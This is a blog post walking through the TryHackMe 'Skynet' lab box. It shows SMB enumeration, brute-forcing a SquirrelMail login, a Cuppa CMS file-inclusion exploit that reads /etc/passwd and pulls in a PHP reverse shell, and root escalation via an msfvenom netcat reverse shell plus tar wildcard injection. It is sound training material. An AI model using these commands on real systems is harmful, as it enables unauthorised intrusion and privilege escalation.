access tty; job control turned off $ whoami www-data $ I stabilize the shell $ python3 -c &#39;import pty;pty.spawn(&quot;/bin/bash&quot;)&#39; www-data@skynet:/usr$ export TERM=xterm export TERM=xterm www-data@skynet:/usr$ stty raw -echo; fg stty raw -echo; fg bash: fg: current: no such job www-data@skynet:/usr$ And get the flag www-data@skynet:/$ ls bin home lib64 opt sbin tmp vmlinuz.old boot initrd.img lost+found proc snap usr dev initrd.img.old media root srv var etc lib mnt run sys vmlinuz www-data@skynet:/$ cd home www-data@skynet:/home$ ls milesdyson www-data@skynet:/home$ cd milesdyson www-data@skynet:/home/milesdyson$ ls backups mail share user.txt www-data@skynet:/home/milesdyson$ cat user.txt xxxe5c2109a40f95809xxxxxxx www-data@skynet:/home/milesdyson$ Escalation We are currently running under the www-data account. Using the password we found earlier I can change to the milesdyson account but that doesn’t help us right now. www-data@skynet:/home/milesdyson$ su milesdyson Password: cyborg007haloterminator milesdyson@skynet: I checked to see if there were any cron jobs running and found one called backup.sh that ran every minute www-data@skynet:/home/milesdyson$ cat /etc/crontab # /etc/crontab: system-wide crontab # Unlike any other crontab you don&#39;t have to run the `crontab&#39; # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command */1 * * * * root /home/milesdyson/backups/backup.sh 17 * * * * root cd / &amp;&amp; run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / &amp;&amp; run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / &amp;&amp; run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / &amp;&amp; run-parts --report /etc/cron.monthly ) # www-data@skynet:/home/milesdyson$ Unfortunately, this is running under root. Looking at the script I see this. www-data@skynet:/home/milesdyson/backups$ cat backup.sh #!/bin/bash cd /var/www/html tar cf /home/milesdyson/backups/backup.tgz * www-data@skynet:/home/milesdyson/backups$ Brick Wall After trying many things, I hit a brick wall and was stuck so I had to resort to trying to find a hint on the web. It was this research that led me to this walktough on YouTube by John Hammond which highlighted a technique, tar wildcard injection which can be read about on this site. Escalation (Resumed) I created reverse netcat shellcode using msfvenom (dspo6㉿kali)[~/pentest/pentest_utils/shells]$ msfvenom -p cmd/unix/reverse_netcat lhost=10.2.2.175 lport=8888 R [-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload [-] No arch selected, selecting arch: cmd from the payload No encoder specified, outputting raw payload Payload size: 88 bytes mkfifo /tmp/pbwq; nc 10.2.2.175 8888 0&lt;/tmp/pbwq | /bin/sh &gt;/tmp/pbwq 2&gt;&amp;1; rm /tmp/pbwq (dspo6㉿kali)[~/pentest/pentest_utils/shells]$ I then created a script on the target using this shellcode and copied it to the folder being backup by the cron job. www-data@skynet:/dev/shm$ echo &quot;mkfifo /tmp/pbwq; nc 10.2.2.175 8888 0&lt;/tmp/pbwq | /bin/sh &gt;/tmp/pbwq 2&gt;&amp;1; rm /tmp/pbwq &gt; &quot; &gt; shell.sh www-data@skynet:/dev/shm$ www-data@skynet:/dev/shm$ cp shell.sh /var/www/html I then ran through the steps indicated on the tar wildcard page and waited for the backup cron job to run. www-data@skynet:/dev/shm$ cp --checkpoint=1 /var/www/html cp: unrecognized option &#39;--checkpoint=1&#39; Try &#39;cp --help&#39; for more information. www-data@skynet:/dev/shm$ cd /var/www/html www-data@skynet:/var/www/html$ echo &quot;&quot; &gt; &quot;--checkpoint-action=exec=sh shell.sh&quot; Shell acheived. (dspo6㉿kali)[~]$ nc -nvlp 8888 listening on [any] 8888 ... connect to [10.2.2.175] from (UNKNOWN) [10.10.184.206] 55396 ls 45kra24zxs28v3yd admin ai --checkpoint-action=exec=sh shell.sh config css image.png index.html js shell.sh style.css cd .. ls html cd .. cd /root ls root.txt cat root.txt XXX4753accc7179a282XXX Note: the tar wildcard exploit says that there is one more command but I got a shell before I executed it. echo &quot;&quot; &gt; --checkpoint=1 Conclusion The first half of owning this box was fun but it was frustrating to have to resort to checking other walkthroughs to make progress at the escalation part. Since I am still learning these techniques, maybe it is not all that bad. I found out about something new and maybe I will be able to use this knowledge in the future.","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/tryhackme/2021/02/28/tryhackme-skynet.html"},"@context":"https://schema.org"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href="/assets/main.css"><link type="application/atom+xml" rel="alternate" href="http://localhost:4000/feed.xml" title="DSPO6" /></head>
<body><header class="site-header" role="banner">

  <div class="wrapper"><a class="site-title" rel="author" href="/">DSPO6</a><nav class="site-nav">
        <input type="checkbox" id="nav-trigger" class="nav-trigger" />
        <label for="nav-trigger">
          <span class="menu-icon">
            <svg viewBox="0 0 18 15" width="18px" height="15px">
              <path d="M18,1.484c0,0.82-0.665,1.484-1.484,1.484H1.484C0.665,2.969,0,2.304,0,1.484l0,0C0,0.665,0.665,0,1.484,0 h15.032C17.335,0,18,0.665,18,1.484L18,1.484z M18,7.516C18,8.335,17.335,9,16.516,9H1.484C0.665,9,0,8.335,0,7.516l0,0 c0-0.82,0.665-1.484,1.484-1.484h15.032C17.335,6.031,18,6.696,18,7.516L18,7.516z M18,13.516C18,14.335,17.335,15,16.516,15H1.484 C0.665,15,0,14.335,0,13.516l0,0c0-0.82,0.665-1.483,1.484-1.483h15.032C17.335,12.031,18,12.695,18,13.516L18,13.516z"/>
            </svg>
          </span>
        </label>

        <div class="trigger"><a class="page-link" href="/about/">About</a></div>
      </nav></div>
</header>
<main class="page-content" aria-label="Content">
      <div class="wrapper">
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">

  <header class="post-header">
    <h1 class="post-title p-name" itemprop="name headline">Tryhackme Walkthough - Skynet</h1>
    <p class="post-meta">
      <time class="dt-published" datetime="2021-02-28T08:18:19-08:00" itemprop="datePublished">Feb 28, 2021
      </time></p>
  </header>

  <div class="post-content e-content" itemprop="articleBody">
    <p>There isn’t much information about this room on the <a href="https://tryhackme.com/room/skynet">Tryhackme</a> page apart from that it is a Terminator themed machine so we will jump right in.</p>

<h2 id="initial-enumeration">Initial Enumeration</h2>
<p>The nmap scan show the following ports open</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
110/tcp open  pop3        Dovecot pop3d
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: ...
</code></pre></div></div>

<p>The webste on port 80 shows this page but looking at the source there isn’t much else to enumerate.</p>

<p><img src="/assets/img/20210228074256.png" alt="" /></p>

<p>I ran a gobuster scan and that found the following folders.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/admin (Status: 301)
/config (Status: 301)
/css (Status: 301)
/index.html (Status: 200)
/js (Status: 301)
/server-status (Status: 403)
/squirrelmail (Status: 301)
==============================
</code></pre></div></div>

<p>The most interesting one here is the <code class="language-plaintext highlighter-rouge">/squirrelmail</code> and navigating to it shows a log in screen.</p>

<p><img src="/assets/img/20210228081225.png" alt="" /></p>

<p>I checked the Exploit DB to see if there was something available for version 1.423 but nothing stood out as being worth trying at this stage.</p>

<h3 id="enumerating-smb">Enumerating SMB</h3>
<p>I ran enum4linx and the output showed 4 shares one of which was anonymous</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>//10.10.237.154/print$  Mapping: DENIED, Listing: N/A
//10.10.237.154/anonymous       Mapping: OK, Listing: OK
//10.10.237.154/milesdyson      Mapping: DENIED, Listing: N/A
//10.10.237.154/IPC$    [E] Can't understand response:
</code></pre></div></div>

<p>Using smbclient without a password, I discovered a file called <code class="language-plaintext highlighter-rouge">attention.txt</code></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(dspo6㉿kali)[~/pentest/boxes/thm/Skynet]$ smbclient -U Anonymous //$IP/anonymous
Enter WORKGROUP\Anonymous's password: 
Try "help" to get a list of possible commands.
smb: \&gt; 
smb: \&gt; ls
  .                                   D        0  Thu Nov 26 11:04:00 2020
  ..                                  D        0  Tue Sep 17 03:20:17 2019
  attention.txt                       N      163  Tue Sep 17 23:04:59 2019
  logs                                D        0  Wed Sep 18 00:42:16 2019

                9204224 blocks of size 1024. 5829532 blocks available
smb: \&gt; mget attention.txt
Get file attention.txt? yes
getting file \attention.txt of size 163 as attention.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \&gt; 
</code></pre></div></div>

<p>This file contained the following text:-</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(dspo6㉿kali)[~/pentest/boxes/thm/Skynet]$ cat attention.txt 
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson
(dspo6㉿kali)[~/pentest/boxes/thm/Skynet]$ 
</code></pre></div></div>

<p>I also navigated to the logs directory which contained 3 log files</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>smb: \logs\&gt; ls
  .                                   D        0  Wed Sep 18 00:42:16 2019
  ..                                  D        0  Thu Nov 26 11:04:00 2020
  log2.txt                            N        0  Wed Sep 18 00:42:13 2019
  log1.txt                            N      471  Wed Sep 18 00:41:59 2019
  log3.txt                            N        0  Wed Sep 18 00:42:16 2019
 ...
</code></pre></div></div>

<p>Two were zero bytes but the <code class="language-plaintext highlighter-rouge">log1.txt</code> contains a list of what could be passwords.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> (dspo6㉿kali)[~/pentest/boxes/thm/Skynet/smb]$ cat log1.txt 
cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
terminator168
terminator16
terminator143
terminator13
terminator123!@#
terminator1056
terminator101
terminator10
terminator02
terminator00
roboterminator
pongterminator
manasturcaluterminator
exterminator95
exterminator200
dterminator
djxterminator
dexterminator
determinator
cyborg007haloterminator
avsterminator
alonsoterminator
Walterminator
79terminator6
1996terminator
</code></pre></div></div>

<h2 id="logging-in-to-email-and-then-smb">Logging in to Email and then SMB</h2>

<p>Going back to the squirrel mail login page, I launched Burpsuite intruder with the list of potential passwords and the name milesdyson that I saw in SMB enumeration.</p>

<p><img src="/assets/img/20210228075545.png" alt="" /></p>

<p><img src="/assets/img/20210228075749.png" alt="" /></p>

<p>Looks like <code class="language-plaintext highlighter-rouge">cyborg007haloterminator</code> is the password and we are in.</p>

<p><img src="/assets/img/20210228075833.png" alt="" /></p>

<p>And the first email mentions a  password</p>

<p><img src="/assets/img/20210228080713.png" alt="" /></p>

<p>Which I then try with the open share for milesdyson found earlier.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(dspo6㉿kali)[](~/pentest/boxes/thm/Skynet]$ smbclient -U milesdyson //10.10.174.240/milesdyson
Enter WORKGROUP\milesdyson's password: 
Try "help" to get a list of possible commands.
smb: \&gt; ls
  .                                   D        0  Tue Sep 17 05:05:47 2019
  ..                                  D        0  Tue Sep 17 23:51:03 2019
  Improving Deep Neural Networks.pdf      N  5743095  Tue Sep 17 05:05:14 2019
  Natural Language Processing-Building Sequence Models.pdf      N 12927230  Tue Sep 17 05:05:14 2019
  Convolutional Neural Networks-CNN.pdf      N 19655446  Tue Sep 17 05:05:14 2019
  notes                               D        0  Tue Sep 17 05:18:40 2019
</code></pre></div></div>

<p>Navigating to the notes directory, I see that there is a file called <code class="language-plaintext highlighter-rouge">important.txt</code> with the following text.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(dspo6㉿kali)[~/pentest/boxes/thm/Skynet]$ cat important.txt 

1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife
(dspo6㉿kali)[~/pentest/boxes/thm/Skynet]$ 
</code></pre></div></div>

<h2 id="cms-enumeration">CMS Enumeration</h2>

<p>Navigating to to the folder mentioned in the <code class="language-plaintext highlighter-rouge">important.txt</code> file we find this page.</p>

<p>![/assets/img/20210228081847.png)</p>

<p>I decide to run gobuster again on this page and the output shows that there is an administrator page</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(dspo6㉿kali)[~/pentest/boxes/thm/Skynet]$ gobuster dir -u 10.10.174.240/45kra24zxs28v3yd  -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.174.240/45kra24zxs28v3yd
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/02/23 20:01:43 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.hta (Status: 403)
/.htaccess (Status: 403)
/administrator (Status: 301)
/index.html (Status: 200)
===============================================================
2021/02/23 20:03:00 Finished
===============================================================
(dspo6㉿kali)[~/pentest/boxes/thm/Skynet]$ 
</code></pre></div></div>

<p>The CMS running is Cuppa CMS</p>

<p><img src="/assets/img/20210228082043.png" alt="" /></p>

<h2 id="cms-exploitation">CMS Exploitation</h2>
<p>Searchspolit leads to this exploit <a href="https://www.exploit-db.com/exploits/25971">https://www.exploit-db.com/exploits/25971</a></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(dspo6㉿kali)[~/pentest/boxes/thm/Skynet]$ searchsploit cuppa
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                           |  Path
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion                                                          | php/webapps/25971.txt
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
(dspo6㉿kali)[~/pentest/boxes/thm/Skynet]$ 
</code></pre></div></div>

<p>I try the exploit to see if it works and it does</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://10.10.125.81/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
</code></pre></div></div>

<p><img src="/assets/img/20210228082507.png" alt="" /></p>

<p>I now try to upload a PHP reverse shell from a webserver on my machine.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(dspo6㉿kali)\[~/pentest/boxes/thm/Skynet\]$ curl http://10.10.125.81/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.2.2.175/php-reverse-shell.php
</code></pre></div></div>

<p>It works - we are in!</p>

<h2 id="getting-the-user-flag">Getting the User Flag</h2>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(dspo6㉿kali)[~]$ nc -lvnp 9003
listening on [any] 9003 ...
connect to [10.2.2.175] from (UNKNOWN) [10.10.125.81] 46742
Linux skynet 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 19:38:51 up 39 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ 
</code></pre></div></div>

<p>I stabilize the shell</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ python3 -c 'import pty;pty.spawn("/bin/bash")'                                                                                      
www-data@skynet:/usr$ export TERM=xterm                                                                                               
export TERM=xterm                                                                                                                     
www-data@skynet:/usr$ stty raw -echo; fg                                                                                              
stty raw -echo; fg                                                                                                                    
bash: fg: current: no such job                                                                                                        
www-data@skynet:/usr$    
</code></pre></div></div>

<p>And get the flag</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>www-data@skynet:/$ ls
bin   home            lib64       opt   sbin  tmp      vmlinuz.old
boot  initrd.img      lost+found  proc  snap  usr
dev   initrd.img.old  media       root  srv   var
etc   lib             mnt         run   sys   vmlinuz
www-data@skynet:/$ cd home
www-data@skynet:/home$ ls
milesdyson
www-data@skynet:/home$ cd milesdyson
www-data@skynet:/home/milesdyson$ ls
backups  mail  share  user.txt
www-data@skynet:/home/milesdyson$ cat user.txt
xxxe5c2109a40f95809xxxxxxx
www-data@skynet:/home/milesdyson$ 
</code></pre></div></div>

<h2 id="escalation">Escalation</h2>
<p>We are currently running under the www-data account.</p>

<p>Using the password we found earlier I can change to the milesdyson account but that doesn’t help us right now.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>www-data@skynet:/home/milesdyson$ su milesdyson
Password: cyborg007haloterminator  

milesdyson@skynet:
</code></pre></div></div>

<p>I checked to see if there were any cron jobs running and found one called backup.sh that ran every minute</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>www-data@skynet:/home/milesdyson$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
*/1 *   * * *   root    /home/milesdyson/backups/backup.sh
17 *    * * *   root    cd / &amp;&amp; run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / &amp;&amp; run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / &amp;&amp; run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / &amp;&amp; run-parts --report /etc/cron.monthly )
#
www-data@skynet:/home/milesdyson$ 
</code></pre></div></div>

<p>Unfortunately, this is running under root.</p>

<p>Looking at the script I see  this.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>www-data@skynet:/home/milesdyson/backups$ cat backup.sh 
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *
www-data@skynet:/home/milesdyson/backups$ 
</code></pre></div></div>

<h2 id="brick-wall">Brick Wall</h2>
<p>After trying many things, I hit a brick wall and was stuck so I had to resort to trying to find a hint on the web.</p>

<p>It was this research that led me to this walktough on YouTube by <a href="https://youtu.be/HXikLrFVIXc">John Hammond</a> which highlighted a technique, tar wildcard injection which can be read about on this <a href="https://www.hackingarticles.in/exploiting-wildcard-for-privilege-escalation/">site</a>.</p>

<h2 id="escalation-resumed">Escalation (Resumed)</h2>
<p>I created reverse netcat shellcode using msfvenom</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(dspo6㉿kali)[~/pentest/pentest_utils/shells]$ msfvenom -p cmd/unix/reverse_netcat lhost=10.2.2.175 lport=8888 R
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 88 bytes
mkfifo /tmp/pbwq; nc 10.2.2.175 8888 0&lt;/tmp/pbwq | /bin/sh &gt;/tmp/pbwq 2&gt;&amp;1; rm /tmp/pbwq
(dspo6㉿kali)[~/pentest/pentest_utils/shells]$
</code></pre></div></div>

<p>I then created a script on the target using this shellcode and copied it to the folder being backup by the cron job.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>www-data@skynet:/dev/shm$ echo "mkfifo /tmp/pbwq; nc 10.2.2.175 8888 0&lt;/tmp/pbwq | /bin/sh &gt;/tmp/pbwq 2&gt;&amp;1; rm /tmp/pbwq
&gt; " &gt; shell.sh
www-data@skynet:/dev/shm$
www-data@skynet:/dev/shm$ cp shell.sh /var/www/html
</code></pre></div></div>

<p>I then ran through the steps indicated on the tar wildcard page and waited for the backup cron job to run.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>www-data@skynet:/dev/shm$ cp --checkpoint=1 /var/www/html
cp: unrecognized option '--checkpoint=1'
Try 'cp --help' for more information.
www-data@skynet:/dev/shm$ cd /var/www/html
www-data@skynet:/var/www/html$ echo "" &gt; "--checkpoint-action=exec=sh shell.sh"
</code></pre></div></div>

<p>Shell acheived.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(dspo6㉿kali)[~]$ nc -nvlp 8888
listening on [any] 8888 ...
connect to [10.2.2.175] from (UNKNOWN) [10.10.184.206] 55396
ls
45kra24zxs28v3yd
admin
ai
--checkpoint-action=exec=sh shell.sh
config
css
image.png
index.html
js
shell.sh
style.css
cd ..
ls
html
cd ..
cd /root
ls
root.txt
cat root.txt
XXX4753accc7179a282XXX
</code></pre></div></div>

<p><strong>Note:</strong> the tar wildcard exploit says that there is one more command but I got a shell before I executed it.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>echo "" &gt; --checkpoint=1
</code></pre></div></div>

<h2 id="conclusion">Conclusion</h2>
<p>The first half of owning this box was fun but it was frustrating to have to resort to checking other walkthroughs to make progress at the escalation part.</p>

<p>Since I am still learning these techniques, maybe it is not all that bad. I found out about something new and maybe I will be able to use this knowledge in the future.</p>

  </div><a class="u-url" href="/tryhackme/2021/02/28/tryhackme-skynet.html" hidden></a>
</article>

      </div>
    </main><footer class="site-footer h-card">
  <data class="u-url" href="/"></data>

  <div class="wrapper">

    <h2 class="footer-heading">DSPO6</h2>

    <div class="footer-col-wrapper">
      <div class="footer-col footer-col-1">
        <ul class="contact-list">
          <li class="p-name">DSPO6</li></ul>
      </div>

      <div class="footer-col footer-col-2"><ul class="social-media-list"><li><a href="https://github.com/dspo6"><svg class="svg-icon"><use xlink:href="/assets/minima-social-icons.svg#github"></use></svg> <span class="username">dspo6</span></a></li><li><a href="https://www.twitter.com/dspo6_"><svg class="svg-icon"><use xlink:href="/assets/minima-social-icons.svg#twitter"></use></svg> <span class="username">dspo6_</span></a></li></ul>
</div>

      <div class="footer-col footer-col-3">
        <p>A place to document my journey in information security.</p>
      </div>
    </div>

  </div>

</footer>
</body>

</html>
